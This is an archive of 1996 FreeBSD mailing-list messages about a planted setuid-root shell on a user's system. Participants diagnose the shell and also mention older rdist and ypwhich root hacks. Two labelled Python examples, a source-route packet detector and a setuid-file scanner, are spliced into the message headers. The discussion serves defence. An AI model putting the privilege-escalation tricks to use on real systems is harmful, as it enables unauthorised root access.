Wilko
_     __________________________________________________________________________
 |   / o / /  _   Wilko Bulte                email: wilko@yedi.iaf.nl
 |/|/ / / /( (_)  Private FreeBSD site - Arnhem - The Netherlands
--------------------------------------------------------------------------------

From owner-freebsd-security Mon Jun 24 12:37:24 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA24897 for security-outgoing; Mon, 24 Jun 1996 12:37:24 -0700 (PDT)
Received: from soda.CSUA.Berkeley.EDU (soda.CSUA.Berkeley.EDU [128.32.43.52]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA24877; Mon, 24 Jun 1996 12:37:19 -0700 (PDT)
Received: (from richardc@localhost) by soda.CSUA.Berkeley.EDU (8.6.12/8.6.12) id MAA14960; Mon, 24 Jun 1996 12:37:22 -0700
Date: Mon, 24 Jun 1996 12:37:18 -0700 (PDT)
From: Veggy Vinny To: Wilko Bulte cc: "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606241819.UAA01054@yedi.iaf.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Speaking about security, we are running a FreeBSD box and there is a guy that has this program that can get root shell as long as he has any account, can someone look into this and find out how he does it? Vince GaiaNet SysAdmin From owner-freebsd-security Mon Jun 24 13:17:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA27165 for security-outgoing; Mon, 24 Jun 1996 13:17:52 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA27143; Mon, 24 Jun 1996 13:17:12 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id WAA06237; Mon, 24 Jun 1996 22:13:46 +0200 (SAT) Message-Id: <199606242013.WAA06237@grumble.grondar.za> To: Veggy Vinny cc: Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! Date: Mon, 24 Jun 1996 22:13:31 +0200 
From: Mark Murray
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Veggy Vinny wrote:
> Speaking about security, we are running a FreeBSD box and there
> is a guy that has this program that can get root shell as long as he has
> any account, can someone look into this and find out how he does it?

Take claims like this with a pinch of salt. ;-)

What is the program? If we know how it works, we can fix any security hole
it may be exploiting.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grondar.za for PGP key

From owner-freebsd-security Mon Jun 24 13:19:47 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA27560 for security-outgoing; Mon, 24 Jun 1996 13:19:47 -0700 (PDT)
Received: from soda.CSUA.Berkeley.EDU (soda.CSUA.Berkeley.EDU [128.32.43.52]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA27519; Mon, 24 Jun 1996 13:19:39 -0700 (PDT)
Received: (from richardc@localhost) by soda.CSUA.Berkeley.EDU (8.6.12/8.6.12) id NAA19341; Mon, 24 Jun 1996 13:19:28 -0700
Date: Mon, 24 Jun 1996 13:19:26 -0700 (PDT)
From: Veggy Vinny
To: Mark Murray
cc: Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606242013.WAA06237@grumble.grondar.za>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 24 Jun 1996, Mark Murray wrote:

> Veggy Vinny wrote:
> > Speaking about security, we are running a FreeBSD box and there
> > is a guy that has this program that can get root shell as long as he has
> > any account, can someone look into this and find out how he does it?
>
> Take claims like this with a pinch of salt. ;-)

I know but I tried it and it does let me run vipw ;-)

> What is the program? If we know how it works, we can fix any security hole
> it may be exploiting.

Hmmm, the program is called root, no sources.. it's just a 278k
binary...

Cheers,
-Vince-
richardc@CSUA.Berkeley.EDU - vince@COSC.GOV - vince@cygnus.sy.yale.edu
GUS Mailing Lists Admin - http://www.COSC.GOV/~vince
UC Berkeley AstroPhysics (B.S.) - Electrical Engineering (Honorary B.S.)
Chabot Observatory & Science Center - Oakland, California USA
Computing Networking Operations - Advisory Council Member
Running FreeBSD - Real UN*X for Free!
Linda Wong/Vivian Chow/Hacken Lee/Danny Chan/Priscilla Chan Fan Club Mailing Lists Admin 1996 Estoril Blue BMW ///M3 - BMW CCA Member Golden Gate Chapter From owner-freebsd-security Mon Jun 24 13:24:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA28110 for security-outgoing; Mon, 24 Jun 1996 13:24:43 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA27993; Mon, 24 Jun 1996 13:23:25 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id WAA06267; Mon, 24 Jun 1996 22:15:38 +0200 (SAT) Message-Id: <199606242015.WAA06267@grumble.grondar.za> To: Wilko Bulte cc: jkh@time.cdrom.com (Jordan K. Hubbard), guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! Date: Mon, 24 Jun 1996 22:15:38 +0200 
From: Mark Murray
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Wilko Bulte wrote:
> > Oh yeah, also, David says both we and CRL (the ISP) block source
> > routed packets.
> >
> > Jordan
>
> This makes me wonder: can ijppp also block source routed packets?
> From the man page I don't see how...

Not by itself, but if you turn on firewalling in your kernel you can.
Look at ipfirewall(4) and ipfw(8).

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grondar.za for PGP key

From owner-freebsd-security Mon Jun 24 13:31:50 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA29015 for security-outgoing; Mon, 24 Jun 1996 13:31:50 -0700 (PDT)
Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA28974; Mon, 24 Jun 1996 13:31:38 -0700 (PDT)
Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id WAA06360; Mon, 24 Jun 1996 22:27:09 +0200 (SAT)
Message-Id: <199606242027.WAA06360@grumble.grondar.za>
To: Veggy Vinny
cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
Date: Mon, 24 Jun 1996 22:27:09 +0200
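What a filter has to look at to do what Mark describes, as an added example that is not part of the original thread and is not ipfirewall(4) or ipfw(8) code: a small IPv4 header parser that walks the option list and reports loose (LSRR, option type 131) or strict (SSRR, option type 137) source routing, which is the condition a "block source routed packets" rule acts on. The header bytes are constructed for the demonstration, and the function names are this example's own.

```python
"""Detect IPv4 source-route options (LSRR/SSRR) in a raw IPv4 header.

Added example, not from the list thread and not FreeBSD code.  The sample
headers are constructed below; nothing here is captured traffic.
"""
import struct

# IPv4 option type codes (RFC 791): EOL, NOP and the two source-route options.
IPOPT_EOL = 0
IPOPT_NOP = 1
IPOPT_LSRR = 131  # 0x83, loose source and record route
IPOPT_SSRR = 137  # 0x89, strict source and record route
SOURCE_ROUTE_OPTS = {IPOPT_LSRR: "LSRR", IPOPT_SSRR: "SSRR"}


def parse_options(header: bytes) -> list:
    """Return [(type, payload), ...] for the options carried in an IPv4 header.

    The length checks are deliberate: a filter that trusts the option length
    byte can be walked off the end of the header by a crafted packet.
    """
    if len(header) < 20 or header[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    ihl = (header[0] & 0x0F) * 4
    if ihl < 20 or ihl > len(header):
        raise ValueError("bad IHL")
    opts = header[20:ihl]
    result = []
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == IPOPT_EOL:
            break
        if kind == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("truncated option")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad option length")
        result.append((kind, opts[i + 2:i + length]))
        i += length
    return result


def source_route(header: bytes):
    """Return (kind, [hop, ...]) if the header carries LSRR/SSRR, else None.

    Anything other than None is the drop condition for a source-route rule.
    """
    for kind, payload in parse_options(header):
        if kind in SOURCE_ROUTE_OPTS:
            route = payload[1:]  # payload[0] is the pointer byte; then 4-byte hops
            hops = [".".join(str(b) for b in route[j:j + 4])
                    for j in range(0, len(route) - len(route) % 4, 4)]
            return SOURCE_ROUTE_OPTS[kind], hops
    return None


def build_header(src: str, dst: str, options: bytes = b"") -> bytes:
    """Build a minimal IPv4 header (checksum left zero) carrying the given options."""
    options += b"\x00" * ((-len(options)) % 4)  # pad to a 32-bit boundary with EOL
    ihl = 5 + len(options) // 4
    fixed = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, ihl * 4, 0, 0, 64, 6, 0,
                        bytes(int(x) for x in src.split(".")),
                        bytes(int(x) for x in dst.split(".")))
    return fixed + options


# Constructed samples: a plain header and one with an LSRR option that routes
# through 193.124.85.134 and then the loopback address.
LSRR_OPTION = bytes([IPOPT_LSRR, 11, 4]) + bytes([193, 124, 85, 134]) + bytes([127, 0, 0, 1])
SAMPLE_PLAIN = build_header("10.0.0.5", "192.0.2.10")
SAMPLE_SOURCE_ROUTED = build_header("10.0.0.5", "192.0.2.10", LSRR_OPTION)

if __name__ == "__main__":
    for name, hdr in (("plain", SAMPLE_PLAIN), ("source-routed", SAMPLE_SOURCE_ROUTED)):
        print(name, "->", source_route(hdr))
```

The parser treats NOP padding and a trailing EOL the way a kernel would, so an option list that hides LSRR behind a NOP still gets reported; a bad length byte raises instead of being trusted.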
From: Mark Murray
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Veggy Vinny wrote:
> > Take claims like this with a pinch of salt. ;-)
>
> I know but I tried it and it does let me run vipw ;-)
>
> > What is the program? If we know how it works, we can fix any security hole
> > it may be exploiting.
>
> Hmmm, the program is called root, no sources.. it's just a 278k
> binary...

With a setuid bit?

Does ktrace(1) give any clues?

What do you get from strings(1)? (Long shot..)

What other exploration have you done?

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grondar.za for PGP key

From owner-freebsd-security Mon Jun 24 13:36:56 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA29657 for security-outgoing; Mon, 24 Jun 1996 13:36:56 -0700 (PDT)
Received: from soda.CSUA.Berkeley.EDU (soda.CSUA.Berkeley.EDU [128.32.43.52]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA29636; Mon, 24 Jun 1996 13:36:51 -0700 (PDT)
Received: (from richardc@localhost) by soda.CSUA.Berkeley.EDU (8.6.12/8.6.12) id NAA20708; Mon, 24 Jun 1996 13:36:53 -0700
Date: Mon, 24 Jun 1996 13:36:51 -0700 (PDT)
From: Veggy Vinny
To: Mark Murray
cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606242027.WAA06360@grumble.grondar.za>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 24 Jun 1996, Mark Murray wrote:

> Veggy Vinny wrote:
> > > Take claims like this with a pinch of salt. ;-)
> >
> > I know but I tried it and it does let me run vipw ;-)
> >
> > > What is the program? If we know how it works, we can fix any security hole
> > > it may be exploiting.
> >
> > Hmmm, the program is called root, no sources.. it's just a 278k
> > binary...
>
> With a setuid bit?

Not too sure...

> Does ktrace(1) give any clues?

Nope... :-(

> What do you get from strings(1)? (Long shot..)

-rwsr-xr-x  1 root  users  278528 Jun 18 04:01 root is from the dir
listing. as for strings... it's really long...

> What other exploration have you done?

Not much really..... I do remember seeing someone like hack root
using ypwhich and it worked too.... that was on 2.1R... -current seemed
to fix it...

Vince
GaiaNet System Administration

From owner-freebsd-security Mon Jun 24 13:46:03 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA00805 for security-outgoing; Mon, 24 Jun 1996 13:46:03 -0700 (PDT)
Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA00798; Mon, 24 Jun 1996 13:45:54 -0700 (PDT)
Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id WAA06435; Mon, 24 Jun 1996 22:43:37 +0200 (SAT)
Message-Id: <199606242043.WAA06435@grumble.grondar.za>
To: Veggy Vinny
cc: Mark Murray , Wilko Bulte , "Jordan K.
Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! Date: Mon, 24 Jun 1996 22:43:36 +0200 From: Mark Murray Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Veggy Vinny wrote: > > With a setuid bit? > > Not too sure... ls -al will tell you this. Come on :-) > > Does ktrace(1) give any clues? > > Nope... :-( > > > What do you get from strings(1)? (Long shot..) > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir ^ | This is a setuid prog. The program is owned by root, and is SETUID, therefore it will run as if it were root. It is probably a shell (bash, sh, csh) renamed to root and setuid. "chmod 755 root" will cut it down to size. > listing. as for strings... it's really long... Try me. Cut out the rubbish and the library crap. > > What other exploration have you done? > > Not much really..... I do remember seeing someone like hack root > using ypwhich and it worked too.... that was on 2.1R... -current seemed > to fix it... M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 14:02:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA02078 for security-outgoing; Mon, 24 Jun 1996 14:02:13 -0700 (PDT) Received: from ref.tfs.com (ref.tfs.com [140.145.254.251]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA02055; Mon, 24 Jun 1996 14:02:08 -0700 (PDT) Received: (from julian@localhost) by ref.tfs.com (8.7.5/8.7.3) id NAA01968; Mon, 24 Jun 1996 13:59:32 -0700 (PDT) Message-Id: <199606242059.NAA01968@ref.tfs.com> Subject: Re: I need help on this one - please help me track this guy down! To: richardc@CSUA.Berkeley.EDU (Veggy Vinny) Date: Mon, 24 Jun 1996 13:59:31 -0700 (PDT) 
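The check Mark is making by eye on the ls -l line, done over whole directory trees, as an added example that is not code from the thread and not FreeBSD's own daily security script: a Python walker that lists every set-id file under the trees you point it at (the thread later names /usr/home, /tmp, /var/tmp and /usr/tmp as the places to look) and flags the root-owned ones, which is how a planted setuid shell like the "root" binary in Vince's listing shows up. The demo tree and its file names are constructed, and the function names are this example's own.

```python
"""Report setuid/setgid files under user-writable trees.

Added example, not the thread's security script and not FreeBSD code.
The demo tree built in demo() is constructed for illustration.
"""
import os
import stat
import tempfile


def scan_setid(roots):
    """Walk each directory tree and return sorted (path, mode, uid, flags)
    tuples for every regular file with the setuid or setgid bit set.

    lstat() is used so a symlink pointing at a setuid binary elsewhere is not
    reported as a finding here; os.walk() does not descend symlinked directories.
    """
    findings = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable; keep scanning
                if not stat.S_ISREG(st.st_mode):
                    continue
                flags = []
                if st.st_mode & stat.S_ISUID:
                    flags.append("setuid")
                if st.st_mode & stat.S_ISGID:
                    flags.append("setgid")
                if not flags:
                    continue
                if st.st_uid == 0:
                    flags.append("root-owned")  # the case that matters: it runs as root
                findings.append((path, stat.filemode(st.st_mode), st.st_uid, flags))
    return sorted(findings)


def format_report(findings):
    """One line per finding, in the ls -l style quoted in the thread."""
    return ["%s uid=%d %s  [%s]" % (mode, uid, path, ", ".join(flags))
            for path, mode, uid, flags in findings]


def demo():
    """Constructed demo tree: a setuid file named 'root' next to a harmless one.
    Returns the base names the scanner reports.  A non-root user may set the
    setuid bit on a file it owns, so this runs without privileges."""
    with tempfile.TemporaryDirectory() as d:
        planted = os.path.join(d, "root")
        harmless = os.path.join(d, "notes")
        for p in (planted, harmless):
            with open(p, "wb") as f:
                f.write(b"#!/bin/sh\n")
        os.chmod(planted, 0o4755)  # -rwsr-xr-x, as in Vince's listing
        os.chmod(harmless, 0o644)
        return [os.path.basename(p) for p, _, _, _ in scan_setid([d])]


if __name__ == "__main__":
    import sys
    targets = sys.argv[1:] or ["/tmp", "/var/tmp", "/usr/tmp", "/usr/home", "/home"]
    for line in format_report(scan_setid(targets)):
        print(line)
```

Run it as root against the directories users can write to; from the shell, find with -perm -4000 gives the same list. Either way the useful output is the diff against the previous run, since a setuid file that was not there yesterday is the finding.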
From: "JULIAN Elischer" Cc: mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org In-Reply-To: from "Veggy Vinny" at Jun 24, 96 01:36:51 pm X-Mailer: ELM [version 2.4 PL25 ME8b] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > > > On Mon, 24 Jun 1996, Mark Murray wrote: > > > > What do you get from strings(1)? (Long shot..) > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir ^ DUH! There was also the one that used rdist in daemon mode to rdist itself a new copy of /etc/passwd (and friends) I haven't looked recently to see if that still works for FreeBSD.. I last looked in 386BSD.. julian From owner-freebsd-security Mon Jun 24 14:57:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA09161 for security-outgoing; Mon, 24 Jun 1996 14:57:46 -0700 (PDT) Received: from andrew.cmu.edu (ANDREW.CMU.EDU [128.2.10.101]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA09155; Mon, 24 Jun 1996 14:57:39 -0700 (PDT) Received: (from postman@localhost) by andrew.cmu.edu (8.7.5/8.7.3) id RAA05938; Mon, 24 Jun 1996 17:52:27 -0400 Received: via switchmail; Mon, 24 Jun 1996 17:52:25 -0400 (EDT) Received: from unix13.andrew.cmu.edu via qmail ID ; Mon, 24 Jun 1996 17:52:00 -0400 (EDT) Received: from unix13.andrew.cmu.edu via qmail ID ; Mon, 24 Jun 1996 17:51:57 -0400 (EDT) Received: from mms.4.60.Jan.26.1995.18.43.47.sun4c.411.EzMail.2.0.CUILIB.3.45.SNAP.NOT.LINKED.unix13.andrew.cmu.edu.sun4c.411 via MS.5.6.unix13.andrew.cmu.edu.sun4c_411; Mon, 24 Jun 1996 17:51:57 -0400 (EDT) Message-ID: <4lnkrxe00YUpQCvVNx@andrew.cmu.edu> Date: Mon, 24 Jun 1996 17:51:57 -0400 (EDT) 
From: Matthew Jason White
To: Veggy Vinny
Subject: Re: I need help on this one - please help me track this guy down!
Cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
In-Reply-To: <199606242043.WAA06435@grumble.grondar.za>
References: <199606242043.WAA06435@grumble.grondar.za>
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Excerpts from freebsd-security: 24-Jun-96 Re: I need help on this one.. by Mark Murray@grondar.za
> | This is a setuid prog. The program is owned by root, and is
> SETUID, therefore it will run as if it were root. It is
> probably a shell (bash, sh, csh) renamed to root and setuid.
> "chmod 755 root" will cut it down to size.

I think perhaps a better question to be asking is how this guy got a
suid shell on that system. It could have been a booby-trapped program
that got run as root, but one would hope that such a chintzy method
wouldn't work on most systems.

-Matt
-----
Matt White
Email: mwhite+@cmu.edu
http://www.cs.cmu.edu/afs/cs/user/mwhite/www/

From owner-freebsd-security Mon Jun 24 15:00:27 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA09441 for security-outgoing; Mon, 24 Jun 1996 15:00:27 -0700 (PDT)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA09429; Mon, 24 Jun 1996 15:00:19 -0700 (PDT)
Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id OAA13542; Mon, 24 Jun 1996 14:58:47 -0700 (PDT)
cc: Veggy Vinny , Mark Murray , Wilko Bulte , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 22:43:36 +0200."
<199606242043.WAA06435@grumble.grondar.za> Date: Mon, 24 Jun 1996 14:58:47 -0700 Message-ID: <13540.835653527@time.cdrom.com> 
From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk If it's setuid root then this whole conversation is somewhat pointless, no? It's like saying "Somebody can break into my house!" and then having it pointed out that this isn't all that unusual given that the perpetrator has a full set of your housekeys and that your wife has been having an affair with him for months anyway and lets him in after you leave for work in the morning. :-) Jordan repl: bad addresses: Mark Murray -- no sub-domain in domain-part of address (@) > Veggy Vinny wrote: > > > With a setuid bit? > > > > Not too sure... > > ls -al will tell you this. Come on :-) > > > > Does ktrace(1) give any clues? > > > > Nope... :-( > > > > > What do you get from strings(1)? (Long shot..) > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > ^ > | This is a setuid prog. The program is owned by root, and is > SETUID, therefore it will run as if it were root. It is > probably a shell (bash, sh, csh) renamed to root and setuid. > "chmod 755 root" will cut it down to size. > > > listing. as for strings... it's really long... > > Try me. Cut out the rubbish and the library crap. > > > > What other exploration have you done? > > > > Not much really..... I do remember seeing someone like hack root > > using ypwhich and it worked too.... that was on 2.1R... -current seemed > > to fix it... 
> > M > -- > Mark Murray > 46 Harvey Rd, Claremont, Cape Town 7700, South Africa > +27 21 61-3768 GMT+0200 > Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 15:09:15 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA10123 for security-outgoing; Mon, 24 Jun 1996 15:09:15 -0700 (PDT) Received: from palmer.demon.co.uk (palmer.demon.co.uk [158.152.50.150]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA10113; Mon, 24 Jun 1996 15:09:09 -0700 (PDT) Received: from palmer.demon.co.uk (localhost [127.0.0.1]) by palmer.demon.co.uk (sendmail/PALMER-2) with ESMTP id WAA26814; Mon, 24 Jun 1996 22:02:26 +0100 (BST) To: batie@agora.rdrop.com (Alan Batie) cc: dunn@harborcom.net, jaeger@com, hackers@FreeBSD.ORG, security@FreeBSD.ORG 
From: "Gary Palmer"
Subject: Re: I need help on this one - please help me track this guy
In-reply-to: Your message of "Sun, 23 Jun 1996 21:11:59 PDT."
Date: Mon, 24 Jun 1996 22:02:25 +0100
Message-ID: <26812.835650145@palmer.demon.co.uk>
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Alan Batie wrote in message ID :

> 11  slip-0.pu.ru (193.124.85.1)  581.747 ms  585.953 ms  509.617 ms
> 12  nat.pu.ru (193.124.85.134)  579.649 ms  553.069 ms  569.455 ms
> 13  gw.pu.ru (193.124.85.219)  565.162 ms  566.153 ms  579.921 ms
> 14  * * *  (localhost appeared here for Jordan)

> If "nat" means what I think it does (Network Address Translation; recently
> devised devices to translate IP addresses so private internal networks can
> reuse addresses in the public space), it's probably an artifact of being
> behind the NAT.

On the other hand, there was (for a LONG time) a `NAT' box at WC, which
was actually a router... (Network Appliance or something? It's a while
back now). That's probably what they have...

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jun 24 15:59:21 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA21972 for security-outgoing; Mon, 24 Jun 1996 15:59:21 -0700 (PDT)
Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA21967; Mon, 24 Jun 1996 15:59:17 -0700 (PDT)
Received: from localhost (scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) with SMTP id SAA27375; Mon, 24 Jun 1996 18:57:27 -0400 (EDT)
Date: Mon, 24 Jun 1996 18:57:27 -0400 (EDT)
From: Chris Watson To: "Jordan K. Hubbard" cc: Veggy Vinny , Mark Murray , Wilko Bulte , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <13540.835653527@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Jordan K. Hubbard wrote: I think it was just the russians trying to steal dysons numero uno VM technology. :) -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext. 126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net http://www.freebsd.org | SysAdmin / Network Engineer / Security ===================================| Member BSDNET team! http://www.bsdnet.org From owner-freebsd-security Mon Jun 24 16:40:26 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA23870 for security-outgoing; Mon, 24 Jun 1996 16:40:26 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA23847; Mon, 24 Jun 1996 16:40:20 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id QAA16166; Mon, 24 Jun 1996 16:39:39 -0700 (PDT) Date: Mon, 24 Jun 1996 16:39:39 -0700 (PDT) 
From: -Vince- To: Mark Murray cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606242043.WAA06435@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Mark Murray wrote: > Veggy Vinny wrote: > > > With a setuid bit? > > > > Not too sure... > > ls -al will tell you this. Come on :-) Hmmm, okay :-) > > > Does ktrace(1) give any clues? > > > > Nope... :-( > > > > > What do you get from strings(1)? (Long shot..) > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > ^ > | This is a setuid prog. The program is owned by root, and is > SETUID, therefore it will run as if it were root. It is > probably a shell (bash, sh, csh) renamed to root and setuid. > "chmod 755 root" will cut it down to size. it does seem like sh or bash... > > listing. as for strings... it's really long... > > Try me. Cut out the rubbish and the library crap. Well, it's actually easier to mail you the binary... > > > What other exploration have you done? > > > > Not much really..... I do remember seeing someone like hack root > > using ypwhich and it worked too.... that was on 2.1R... -current seemed > > to fix it... 
Vince
System Administration/GaiaNet Corporation

From owner-freebsd-security Mon Jun 24 16:46:08 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA24111 for security-outgoing; Mon, 24 Jun 1996 16:46:08 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA24092; Mon, 24 Jun 1996 16:46:01 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id QAA17026; Mon, 24 Jun 1996 16:45:42 -0700 (PDT)
Date: Mon, 24 Jun 1996 16:45:42 -0700 (PDT)
